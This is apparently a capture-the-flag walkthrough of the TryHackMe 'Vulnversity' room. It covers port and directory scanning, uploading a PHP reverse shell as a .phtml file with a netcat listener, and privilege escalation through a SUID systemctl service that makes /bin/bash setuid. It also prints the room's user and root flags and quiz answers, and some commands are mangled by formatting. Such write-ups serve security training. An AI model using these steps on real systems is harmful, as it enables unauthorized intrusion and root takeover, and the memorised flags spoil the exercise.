Home
Gazette
Reporter
Favorite
Prize
Pricing
About
Terms
Legals
Video
Contact
Login...
   Gazette    Reporter

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)


04/12/2024 Shad Hussain Knowledge Views 204 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - Vulnversity - THM 

Room Link : https://tryhackme.com/r/room/vulnversity


STEP1
nmap -p- -sSV 10.10.142.86 -Pn -T4 -A
FINDING
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           vsftpd 3.0.3
22/tcp   open  ssh           OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds?
3128/tcp open  squid-http?
3333/tcp open  dec-notes?

Scan the box; how many ports are open?
6
What version of the squid proxy is running on the machine?
3.5.12
How many ports will Nmap scan if the flag -p-400 was used?
400
What is the most likely operating system this machine is running?
Ubuntu
What port is the web server running on?
3333
What is the flag for enabling verbose mode using Nmap?
-v
-----------------------------------------------------------------------------------------------------
STEP2
gobuster dir -u http://10.10.142.86:3333/  -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
FINDING
/images               (Status: 301) [Size: 320] [-- http://10.10.142.86:3333/images/]
/css                  (Status: 301) [Size: 317] [-- http://10.10.142.86:3333/css/]
/js                   (Status: 301) [Size: 316] [-- http://10.10.142.86:3333/js/]
/internal             (Status: 301) [Size: 322] [-- http://10.10.142.86:3333/internal/]

What is the directory that has an upload form page?
/internal/
-----------------------------------------------------------------------------------------------------
STEP3
dirb http://10.10.142.86:3333/internal/ 
FINDING
= DIRECTORY: http://10.10.142.86:3333/internal/uploads/ 
-----------------------------------------------------------------------------------------------------
STEP4
upload a phprevershell.phtml @ http://10.10.142.86:3333/internal/

try these extentions
.php
.php3
.php4
.php5
.phtml
see uploaded file @ http://10.10.142.86:3333/internal/uploads/ 
on new terminal nc -nvlp 1234
@ http://10.10.142.86:3333/internal/uploads/revershell.phtml

get reverse connection on the terminal

cd /home
cd bill
cat user.txt
FINDING
8bd7992fbe8a6ad22a63361004cfcedb

What common file type youd want to upload to exploit the server is blocked? Try a couple to find out.
.php
What extension is allowed after running the above exercise?
.phtml
What is the name of the user who manages the webserver?
bill
What is the user flag?
8bd7992fbe8a6ad22a63361004cfcedb
-----------------------------------------------------------------------------------------------------
STEP5
python -c import pty; pty.spawn("/bin/bash")
find / -type f -perm -4000 2/dev/null
FINDING
/bin/systemctl
On the system, search for all SUID files. Which file stands out?
/bin/systemctl
-----------------------------------------------------------------------------------------------------
STEP6
now use -- https://gtfobins.github.io/gtfobins/systemctl/

on shell -- type below

TF=$(mktemp).service
echo [Service]
            Type=oneshot
            ExecStart=/bin/sh -c "chmod +s /bin/bash"
            [Install]
           WantedBy=multi-user.target  $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
bash -p
cd /root
ls
cat root.txt
a58ff8579f0a9270368d33a9966c7fd5

FINDING
What is the root flag value?
a58ff8579f0a9270368d33a9966c7fd5
-----------------------------------------------------------------------------------------------------

No article(s) with matching content

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!
 




© mutebreak.com | All Rights Reserved